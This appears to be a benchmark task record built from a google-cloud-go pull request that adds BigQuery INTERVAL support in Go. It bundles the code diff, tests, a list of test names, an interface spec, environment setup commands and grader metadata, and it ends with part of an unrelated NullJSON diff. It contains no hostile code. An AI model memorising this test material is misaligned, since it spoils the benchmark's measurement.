month values. + Years int32 + Months int32 + + // In canonical form, Days are independent of the other parts and can have it's + // own sign. There is no attempt to reduce larger Day values into the Y-M part. + Days int32 + + // In canonical form, the time parts all share a consistent sign and are reduced. + Hours int32 + Minutes int32 + Seconds int32 + // This represents the fractional seconds as nanoseconds. + SubSecondNanos int32 +} + +// String returns string representation of the interval value using the canonical format. 
+// The canonical format is as follows: +// +// [sign]Y-M [sign]D [sign]H:M:S[.F] +func (iv *IntervalValue) String() string { + // Don't canonicalize the current value. Instead, if it's not canonical, + // compute the canonical form and use that. + src := iv + if !iv.IsCanonical() { + src = iv.Canonicalize() + } + out := fmt.Sprintf("%d-%d %d %d:%d:%d", src.Years, int32abs(src.Months), src.Days, src.Hours, int32abs(src.Minutes), int32abs(src.Seconds)) + if src.SubSecondNanos != 0 { + mantStr := fmt.Sprintf("%09d", src.SubSecondNanos) + for len(mantStr) > 0 && mantStr[len(mantStr)-1:] == "0" { + mantStr = mantStr[0 : len(mantStr)-1] + } + out = fmt.Sprintf("%s.%s", out, mantStr) + } + return out +} + +// intervalPart is used for parsing string representations. +type intervalPart int + +const ( + yearsPart = iota + monthsPart + daysPart + hoursPart + minutesPart + secondsPart + subsecsPart +) + +func (i intervalPart) String() string { + knownParts := []string{"YEARS", "MONTHS", "DAYS", "HOURS", "MINUTES", "SECONDS", "SUBSECONDS"} + if i < 0 || int(i) > len(knownParts) { + return fmt.Sprintf("UNKNOWN(%d)", i) + } + return knownParts[i] +} + +// canonicalParts indicates the parse order for canonical format. +var canonicalParts = []intervalPart{yearsPart, monthsPart, daysPart, hoursPart, minutesPart, secondsPart, subsecsPart} + +// ParseInterval parses an interval in canonical string format and returns the IntervalValue it represents. 
+func ParseInterval(value string) (*IntervalValue, error) { + iVal := &IntervalValue{} + for _, part := range canonicalParts { + remaining, v, err := getPartValue(part, value) + if err != nil { + return nil, err + } + switch part { + case yearsPart: + iVal.Years = v + case monthsPart: + iVal.Months = v + if iVal.Years < 0 { + iVal.Months = -v + } + case daysPart: + iVal.Days = v + case hoursPart: + iVal.Hours = v + case minutesPart: + iVal.Minutes = v + if iVal.Hours < 0 { + iVal.Minutes = -v + } + case secondsPart: + iVal.Seconds = v + if iVal.Hours < 0 { + iVal.Seconds = -v + } + case subsecsPart: + iVal.SubSecondNanos = v + if iVal.Hours < 0 { + iVal.SubSecondNanos = -v + } + default: + return nil, fmt.Errorf("encountered invalid part %s during parse", part) + } + value = remaining + } + return iVal, nil +} + +func getPartValue(part intervalPart, s string) (string, int32, error) { + s = trimPrefix(part, s) + return getNumVal(part, s) +} + +// trimPrefix removes formatting prefix relevant to the given type. 
+func trimPrefix(part intervalPart, s string) string { + var trimByte byte + switch part { + case yearsPart, daysPart, hoursPart: + trimByte = byte(' ') + case monthsPart: + trimByte = byte('-') + case minutesPart, secondsPart: + trimByte = byte(':') + case subsecsPart: + trimByte = byte('.') + } + for len(s) > 0 && s[0] == trimByte { + s = s[1:] + } + return s +} + +func getNumVal(part intervalPart, s string) (string, int32, error) { + + allowedVals := []byte("0123456789") + var allowedSign bool + captured := "" + switch part { + case yearsPart, daysPart, hoursPart: + allowedSign = true + } + // capture sign prefix +/- + if len(s) > 0 && allowedSign { + switch s[0] { + case '-': + captured = "-" + s = s[1:] + case '+': + s = s[1:] + } + } + for len(s) > 0 && bytes.IndexByte(allowedVals, s[0]) >= 0 { + captured = captured + string(s[0]) + s = s[1:] + } + + if len(captured) == 0 { + if part == subsecsPart { + return s, 0, nil + } + return "", 0, fmt.Errorf("no value parsed for part %s", part.String()) + } + // special case: subsecs is a mantissa, convert it to nanos + if part == subsecsPart { + parsed, err := strconv.ParseFloat(fmt.Sprintf("0.%s", captured), 64) + if err != nil { + return "", 0, fmt.Errorf("couldn't parse %s as %s", captured, part.String()) + } + return s, int32(parsed * 1e9), nil + } + parsed, err := strconv.ParseInt(captured, 10, 32) + if err != nil { + return "", 0, fmt.Errorf("error parsing value %s for %s: %v", captured, part.String(), err) + } + return s, int32(parsed), nil +} + +// IntervalValueFromDuration converts a time.Duration to an IntervalType representation. +// +// The converted duration only leverages the hours/minutes/seconds part of the interval, +// the other parts representing days, months, and years are not used. 
+func IntervalValueFromDuration(in time.Duration) *IntervalValue { + nanos := in.Nanoseconds() + out := &IntervalValue{} + out.Hours = int32(nanos / 3600 / 1e9) + nanos = nanos - (int64(out.Hours) * 3600 * 1e9) + out.Minutes = int32(nanos / 60 / 1e9) + nanos = nanos - (int64(out.Minutes) * 60 * 1e9) + out.Seconds = int32(nanos / 1e9) + nanos = nanos - (int64(out.Seconds) * 1e9) + out.SubSecondNanos = int32(nanos) + return out +} + +// ToDuration converts an interval to a time.Duration value. +// +// For the purposes of conversion: +// Years are normalized to 12 months. +// Months are normalized to 30 days. +// Days are normalized to 24 hours. +func (iv *IntervalValue) ToDuration() time.Duration { + var accum int64 + accum = 12*int64(iv.Years) + int64(iv.Months) + // widen to days + accum = accum*30 + int64(iv.Days) + // hours + accum = accum*24 + int64(iv.Hours) + // minutes + accum = accum*60 + int64(iv.Minutes) + // seconds + accum = accum*60 + int64(iv.Seconds) + // subsecs + accum = accum*1e9 + int64(iv.SubSecondNanos*1e9) + return time.Duration(accum) +} + +// Canonicalize returns an IntervalValue where signs for elements in the +// Y-M and H:M:S.F are consistent and values are normalized/reduced. +// +// Canonical form enables more consistent comparison of the encoded +// interval. For example, encoding an interval with 12 months is equivalent +// to an interval of 1 year. +func (iv *IntervalValue) Canonicalize() *IntervalValue { + newIV := &IntervalValue{iv.Years, iv.Months, iv.Days, iv.Hours, iv.Minutes, iv.Seconds, iv.SubSecondNanos} + // canonicalize Y-M part + totalMonths := iv.Years*12 + iv.Months + newIV.Years = totalMonths / 12 + totalMonths = totalMonths - (newIV.Years * 12) + newIV.Months = totalMonths % 12 + + // No canonicalization for the Days part. + + // canonicalize time part by switching to Nanos. 
+ totalNanos := int64(iv.Hours)*3600*1e9 + + int64(iv.Minutes)*60*1e9 + + int64(iv.Seconds)*1e9 + + int64(iv.SubSecondNanos) + + // Reduce to parts. + newIV.Hours = int32(totalNanos / 60 / 60 / 1e9) + totalNanos = totalNanos - (int64(newIV.Hours) * 3600 * 1e9) + newIV.Minutes = int32(totalNanos / 60 / 1e9) + totalNanos = totalNanos - (int64(newIV.Minutes) * 60 * 1e9) + newIV.Seconds = int32(totalNanos / 1e9) + totalNanos = totalNanos - (int64(newIV.Seconds) * 1e9) + newIV.SubSecondNanos = int32(totalNanos) + return newIV +} + +// IsCanonical evaluates whether the current representation is in canonical +// form. +func (iv *IntervalValue) IsCanonical() bool { + if !sameSign(iv.Years, iv.Months) || + !sameSign(iv.Hours, iv.Minutes) { + return false + } + // We allow large days and hours values, because they are within different parts. + if int32abs(iv.Months) > 12 || + int32abs(iv.Minutes) > 60 || + int32abs(iv.Seconds) > 60 || + int32abs(iv.SubSecondNanos) > 1e9 { + return false + } + // TODO: We don't currently validate that each part represents value smaller than 10k years. 
+ return true +} + +func int32abs(x int32) int32 { + if x < 0 { + return -x + } + return x +} + +func sameSign(nums ...int32) bool { + var pos, neg int + for _, n := range nums { + if n > 0 { + pos = pos + 1 + } + if n < 0 { + neg = neg + 1 + } + } + if pos > 0 && neg > 0 { + return false + } + return true +} diff --git a/bigquery/params.go b/bigquery/params.go index 1171d50cbb..3c8f0f55be 100644 --- a/bigquery/params.go +++ b/bigquery/params.go @@ -77,14 +77,16 @@ var ( numericParamType = &bq.QueryParameterType{Type: "NUMERIC"} bigNumericParamType = &bq.QueryParameterType{Type: "BIGNUMERIC"} geographyParamType = &bq.QueryParameterType{Type: "GEOGRAPHY"} + intervalParamType = &bq.QueryParameterType{Type: "INTERVAL"} ) var ( - typeOfDate = reflect.TypeOf(civil.Date{}) - typeOfTime = reflect.TypeOf(civil.Time{}) - typeOfDateTime = reflect.TypeOf(civil.DateTime{}) - typeOfGoTime = reflect.TypeOf(time.Time{}) - typeOfRat = reflect.TypeOf(&big.Rat{}) + typeOfDate = reflect.TypeOf(civil.Date{}) + typeOfTime = reflect.TypeOf(civil.Time{}) + typeOfDateTime = reflect.TypeOf(civil.DateTime{}) + typeOfGoTime = reflect.TypeOf(time.Time{}) + typeOfRat = reflect.TypeOf(&big.Rat{}) + typeOfIntervalValue = reflect.TypeOf(&IntervalValue{}) ) // A QueryParameter is a parameter to a query. @@ -106,6 +108,7 @@ type QueryParameter struct { // []byte: BYTES // time.Time: TIMESTAMP // *big.Rat: NUMERIC + // *IntervalValue: INTERVAL // Arrays and slices of the above. // Structs of the above. Only the exported fields are used. // @@ -156,6 +159,8 @@ func paramType(t reflect.Type) (*bq.QueryParameterType, error) { return timestampParamType, nil case typeOfRat: return numericParamType, nil + case typeOfIntervalValue: + return intervalParamType, nil case typeOfNullBool: return boolParamType, nil case typeOfNullFloat64: @@ -300,6 +305,9 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { // to honor previous behavior and send as Numeric type. 
res.Value = NumericString(v.Interface().(*big.Rat)) return res, nil + case typeOfIntervalValue: + res.Value = IntervalString(v.Interface().(*IntervalValue)) + return res, nil } switch t.Kind() { case reflect.Slice: @@ -379,6 +387,7 @@ var paramTypeToFieldType = map[string]FieldType{ numericParamType.Type: NumericFieldType, bigNumericParamType.Type: BigNumericFieldType, geographyParamType.Type: GeographyFieldType, + intervalParamType.Type: IntervalFieldType, } // Convert a parameter value from the service to a Go value. This is similar to, but diff --git a/bigquery/schema.go b/bigquery/schema.go index 78f2f76286..f5e2d4130d 100644 --- a/bigquery/schema.go +++ b/bigquery/schema.go @@ -242,6 +242,8 @@ const ( // BigNumericFieldType is a numeric field type that supports values of larger precision // and scale than the NumericFieldType. BigNumericFieldType FieldType = "BIGNUMERIC" + // IntervalFieldType is a representation of a duration or an amount of time. + IntervalFieldType FieldType = "INTERVAL" ) var ( @@ -260,6 +262,7 @@ var ( NumericFieldType: true, GeographyFieldType: true, BigNumericFieldType: true, + IntervalFieldType: true, } // The API will accept alias names for the types based on the Standard SQL type names. 
fieldAliases = map[FieldType]FieldType{ diff --git a/bigquery/value.go b/bigquery/value.go index cae28be046..84e55acaae 100644 --- a/bigquery/value.go +++ b/bigquery/value.go @@ -735,6 +735,13 @@ func toUploadValueReflect(v reflect.Value, fs *FieldSchema) interface{} { return formatUploadValue(v, fs, func(v reflect.Value) string { return BigNumericString(v.Interface().(*big.Rat)) }) + case IntervalFieldType: + if r, ok := v.Interface().(*IntervalValue); ok && r == nil { + return nil + } + return formatUploadValue(v, fs, func(v reflect.Value) string { + return IntervalString(v.Interface().(*IntervalValue)) + }) default: if !fs.Repeated || v.Len() > 0 { return v.Interface() @@ -821,6 +828,12 @@ func BigNumericString(r *big.Rat) string { return r.FloatString(BigNumericScaleDigits) } +// IntervalString returns a string representing an *IntervalValue in a format compatible with +// BigQuery SQL. It returns an interval literal in canonical format. +func IntervalString(iv *IntervalValue) string { + return iv.String() +} + // convertRows converts a series of TableRows into a series of Value slices. // schema is used to interpret the data from rows; its length must match the // length of each row. @@ -947,6 +960,12 @@ func convertBasicType(val string, typ FieldType) (Value, error) { return Value(r), nil case GeographyFieldType: return val, nil + case IntervalFieldType: + i, err := ParseInterval(val) + if err != nil { + return nil, fmt.Errorf("bigquery: invalid INTERVAL value %q", val) + } + return Value(i), nil default: return nil, fmt.Errorf("unrecognized type: %s", typ) }
feat(bigquery): add interval support This PR adds INTERVAL type support to cloud.google.com/go/bigquery It includes a new go type (IntervalValue), which can be used to represent/manipulate an interval value. It also includes requisite param support (using IntervalValue). Conversions between IntervalValue and time.Duration are also supported, but you can't directly supply time.Duration as a query param without first converting. Questions to Resolve: * **Should IntervalValue live in the bigquery/types directory, or should this live elsewhere?** It's not a civil type, so it doesn't belong in cloud.google.com/go/civil. It _may_ someday be supported by other SQL engines, so perhaps a more general sqltypes? Status: **RESOLVED**. Moved IntervalValue into the main bigquery package rather than a types sub-package. * **Do we need to support ISO8601 duration parsing/conversion?** Out of scope for current FR, but is there anything in the existing signatures that should change to support it? Should ParseInterval() accept a format string, or should there be a ParseInternalFrom8601Duration() or similar?
**Title** Add full support for the BigQuery INTERVAL data type **Problem** The client library could not represent, serialize, or deserialize BigQuery INTERVAL values, making it impossible to use intervals in query parameters, schema definitions, or result rows. This gap caused runtime errors when users attempted to work with interval data. **Root Cause** The library’s type system, parameter handling, schema metadata, and value conversion logic lacked definitions and mappings for the INTERVAL type. **Fix / Expected Behavior** - Introduce a Go representation for interval values, including canonical string formatting, parsing, and conversion to/from `time.Duration`. - Enable interval literals to be used as query parameters and correctly typed in schema definitions. - Map the new interval type to the appropriate BigQuery field type throughout the client (parameter type detection, field‑type mapping, upload formatting, and result conversion). - Ensure nil interval values are handled gracefully during uploads. - Preserve existing behavior for all other data types. **Risk & Validation** - Verify that interval parameters are sent to the service in the expected canonical format and that queries execute without errors. - Confirm that interval fields returned in query results are correctly parsed back into the new Go type. - Run the full test suite and add targeted tests for interval handling to guard against regressions in existing data‑type processing.
5,907
googleapis/google-cloud-go
diff --git a/bigquery/intervalvalue_test.go b/bigquery/intervalvalue_test.go new file mode 100644 index 0000000000..f657eb4a1c --- /dev/null +++ b/bigquery/intervalvalue_test.go @@ -0,0 +1,179 @@ +// Copyright 2022 Google LLC +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package bigquery + +import ( + "testing" + "time" + + "cloud.google.com/go/internal/testutil" +) + +func TestParseInterval(t *testing.T) { + testcases := []struct { + inputStr string + wantInterval *IntervalValue + wantErr bool + }{ + { + inputStr: "", + wantErr: true, + }, + { + inputStr: "1-2 3", + wantErr: true, + }, + { + inputStr: "1-2 3 4:5:6", + wantInterval: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + }, + { + inputStr: "1-2 3 4:5:6.5", + wantInterval: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 500000000}, + }, + { + inputStr: "-1-2 3 -4:5:6.123", + wantInterval: &IntervalValue{Years: -1, Months: -2, Days: 3, Hours: -4, Minutes: -5, Seconds: -6, SubSecondNanos: -123000000}, + }, + { + inputStr: "0-0 0 1:1:1.000000001", + wantInterval: &IntervalValue{Hours: 1, Minutes: 1, Seconds: 1, SubSecondNanos: 1}, + }, + } + + for _, tc := range testcases { + gotInterval, err := ParseInterval(tc.inputStr) + if tc.wantErr { + if err != nil { + continue + } + t.Errorf("input %s: wanted err, got success", tc.inputStr) + } + if err != nil { + t.Errorf("input %s got err: %v", 
tc.inputStr, err) + } + if diff := testutil.Diff(gotInterval, tc.wantInterval); diff != "" { + t.Errorf("input %s: got=-, want=+:\n%s", tc.inputStr, diff) + } + } +} + +func TestCanonicalInterval(t *testing.T) { + testcases := []struct { + description string + input *IntervalValue + wantCanonical *IntervalValue + wantString string + }{ + { + description: "already canonical", + input: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + wantCanonical: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + wantString: "1-2 3 4:5:6", + }, + { + description: "mixed Y-M", + input: &IntervalValue{Years: -1, Months: 28}, + wantCanonical: &IntervalValue{Years: 1, Months: 4, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "1-4 0 0:0:0", + }, + { + description: "mixed Y-M", + input: &IntervalValue{Years: -1, Months: 28}, + wantCanonical: &IntervalValue{Years: 1, Months: 4, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "1-4 0 0:0:0", + }, + { + description: "big month Y-M", + input: &IntervalValue{Years: 0, Months: -13}, + wantCanonical: &IntervalValue{Years: -1, Months: -1, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "-1-1 0 0:0:0", + }, + { + description: "big days not normalized", + input: &IntervalValue{Days: 1000}, + wantCanonical: &IntervalValue{Years: 0, Months: 0, Days: 1000, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "0-0 1000 0:0:0", + }, + { + description: "time reduced", + input: &IntervalValue{Minutes: 181, Seconds: 61, SubSecondNanos: 5}, + wantCanonical: &IntervalValue{Hours: 3, Minutes: 2, Seconds: 1, SubSecondNanos: 5}, + wantString: "0-0 0 3:2:1.000000005", + }, + { + description: "subseconds oversized", + input: &IntervalValue{SubSecondNanos: 1900000000}, + wantCanonical: &IntervalValue{Years: 0, Months: 0, Days: 0, Hours: 0, Minutes: 0, Seconds: 1, 
SubSecondNanos: 900000000}, + wantString: "0-0 0 0:0:1.9", + }, + } + + for _, tc := range testcases { + gotCanonical := tc.input.Canonicalize() + + if diff := testutil.Diff(gotCanonical, tc.wantCanonical); diff != "" { + t.Errorf("%s: got=-, want=+:\n%s", tc.description, diff) + } + + gotStr := tc.input.String() + if gotStr != tc.wantString { + t.Errorf("%s mismatched strings. got %s want %s", tc.description, gotStr, tc.wantString) + } + } +} + +func TestIntervalDuration(t *testing.T) { + testcases := []struct { + description string + inputInterval *IntervalValue + wantDuration time.Duration + wantInterval *IntervalValue + }{ + { + description: "hour", + inputInterval: &IntervalValue{Hours: 1}, + wantDuration: time.Duration(time.Hour), + wantInterval: &IntervalValue{Hours: 1}, + }, + { + description: "minute oversized", + inputInterval: &IntervalValue{Minutes: 62}, + wantDuration: time.Duration(62 * time.Minute), + wantInterval: &IntervalValue{Hours: 1, Minutes: 2}, + }, + { + description: "other parts", + inputInterval: &IntervalValue{Months: 1, Days: 2}, + wantDuration: time.Duration(32 * 24 * time.Hour), + wantInterval: &IntervalValue{Hours: 32 * 24}, + }, + } + + for _, tc := range testcases { + gotDuration := tc.inputInterval.ToDuration() + + // interval -> duration + if gotDuration != tc.wantDuration { + t.Errorf("%s: mismatched duration, got %v want %v", tc.description, gotDuration, tc.wantDuration) + } + + // duration -> interval (canonical) + gotInterval := IntervalValueFromDuration(gotDuration) + if diff := testutil.Diff(gotInterval, tc.wantInterval); diff != "" { + t.Errorf("%s: got=-, want=+:\n%s", tc.description, diff) + } + } +} diff --git a/bigquery/params_test.go b/bigquery/params_test.go index d9233cad6e..366184894a 100644 --- a/bigquery/params_test.go +++ b/bigquery/params_test.go @@ -116,6 +116,7 @@ var scalarTests = []struct { dateTimeParamType, NullDateTime{Valid: false}}, {big.NewRat(12345, 1000), false, "12.345000000", numericParamType, 
big.NewRat(12345, 1000)}, + {&IntervalValue{Years: 1, Months: 2, Days: 3}, false, "1-2 3 0:0:0", intervalParamType, &IntervalValue{Years: 1, Months: 2, Days: 3}}, {NullGeography{GeographyVal: "POINT(-122.335503 47.625536)", Valid: true}, false, "POINT(-122.335503 47.625536)", geographyParamType, "POINT(-122.335503 47.625536)"}, {NullGeography{Valid: false}, true, "", geographyParamType, NullGeography{Valid: false}}, } diff --git a/bigquery/schema_test.go b/bigquery/schema_test.go index 17b7fc7157..d69cbbd822 100644 --- a/bigquery/schema_test.go +++ b/bigquery/schema_test.go @@ -1084,7 +1084,8 @@ func TestSchemaFromJSON(t *testing.T) { {"name":"aliased_boolean","type":"BOOL","mode":"NULLABLE","description":"Aliased nullable boolean"}, {"name":"aliased_float","type":"FLOAT64","mode":"REQUIRED","description":"Aliased required float"}, {"name":"aliased_record","type":"STRUCT","mode":"NULLABLE","description":"Aliased nullable record"}, - {"name":"aliased_bignumeric","type":"BIGDECIMAL","mode":"NULLABLE","description":"Aliased nullable bignumeric"} + {"name":"aliased_bignumeric","type":"BIGDECIMAL","mode":"NULLABLE","description":"Aliased nullable bignumeric"}, + {"name":"flat_interval","type":"INTERVAL","mode":"NULLABLE","description":"Flat nullable interval"} ]`), expectedSchema: Schema{ fieldSchema("Flat nullable string", "flat_string", "STRING", false, false, nil), @@ -1104,6 +1105,7 @@ func TestSchemaFromJSON(t *testing.T) { fieldSchema("Aliased required float", "aliased_float", "FLOAT", false, true, nil), fieldSchema("Aliased nullable record", "aliased_record", "RECORD", false, false, nil), fieldSchema("Aliased nullable bignumeric", "aliased_bignumeric", "BIGNUMERIC", false, false, nil), + fieldSchema("Flat nullable interval", "flat_interval", "INTERVAL", false, false, nil), }, }, {
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/NaN", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/null", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", 
"TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Method: (*IntervalValue).Canonicalize() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (any sign/scale) Outputs: *IntervalValue – a new value where Y‑M and H:M:S.F components have consistent signs and are reduced (months < 12, minutes < 60, etc.) Description: Normalizes an IntervalValue to its canonical form for reliable comparison and formatting. Method: (*IntervalValue).String() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (any form) Outputs: string – canonical interval literal (e.g., “1-2 3 4:5:6.5”) Description: Returns the interval in BigQuery’s canonical string representation, canonicalizing the value first if needed. Method: (*IntervalValue).ToDuration() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (components may include years, months, days, etc.) Outputs: time.Duration – duration representing the interval (years → 12 months, months → 30 days, days → 24 hours) Description: Converts an IntervalValue to a Go time.Duration, using only the time‑related parts after normalizing larger units. Function: ParseInterval(value string) (*IntervalValue, error) Location: bigquery/intervalvalue.go Inputs: value – interval literal in canonical format (e.g., “1-2 3 4:5:6.5”) Outputs: *IntervalValue – parsed representation; error if parsing fails Description: Parses a canonical interval string into an IntervalValue, handling sign and fractional seconds. Function: IntervalValueFromDuration(d time.Duration) *IntervalValue Location: bigquery/intervalvalue.go Inputs: d – Go time.Duration Outputs: *IntervalValue – interval containing only hour, minute, second, sub‑second fields (canonicalized) Description: Creates an IntervalValue from a duration, distributing the duration into hours, minutes, seconds and nanoseconds.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 4, "num_modified_lines": 357, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "size: l: Pull request size is large." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding INTERVAL type support to the BigQuery client, which the tests exercise by parsing, canonicalizing, and converting intervals, as well as handling them in params and schema. The test expectations are clear and match the implemented behavior, and there are no signs of test coupling, hidden naming requirements, external dependencies, ambiguous specs, unrelated patch artifacts, or undocumented domain knowledge. 
Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
38af8ae88ae851ca21cf385795250ed8e8d16aab
2022-05-04 00:17:02
googleapis__google-cloud-go-5986
diff --git a/bigquery/nulls.go b/bigquery/nulls.go index 6ef53d13fc..cbe4fa34dc 100644 --- a/bigquery/nulls.go +++ b/bigquery/nulls.go @@ -60,6 +60,14 @@ type NullGeography struct { func (n NullGeography) String() string { return nullstr(n.Valid, n.GeographyVal) } +// NullJSON represents a BigQuery JSON string that may be NULL. +type NullJSON struct { + JSONVal string + Valid bool // Valid is true if JSONVal is not NULL. +} + +func (n NullJSON) String() string { return nullstr(n.Valid, n.JSONVal) } + // NullFloat64 represents a BigQuery FLOAT64 that may be NULL. type NullFloat64 struct { Float64 float64 @@ -147,6 +155,9 @@ func (n NullString) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.S // MarshalJSON converts the NullGeography to JSON. func (n NullGeography) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.GeographyVal) } +// MarshalJSON converts the NullJSON to JSON. +func (n NullJSON) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.JSONVal) } + // MarshalJSON converts the NullTimestamp to JSON. func (n NullTimestamp) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.Timestamp) } @@ -268,6 +279,20 @@ func (n *NullGeography) UnmarshalJSON(b []byte) error { return nil } +// UnmarshalJSON converts JSON into a NullJSON. +func (n *NullJSON) UnmarshalJSON(b []byte) error { + n.Valid = false + n.JSONVal = "" + if bytes.Equal(b, jsonNull) { + return nil + } + if err := json.Unmarshal(b, &n.JSONVal); err != nil { + return err + } + n.Valid = true + return nil +} + // UnmarshalJSON converts JSON into a NullTimestamp. 
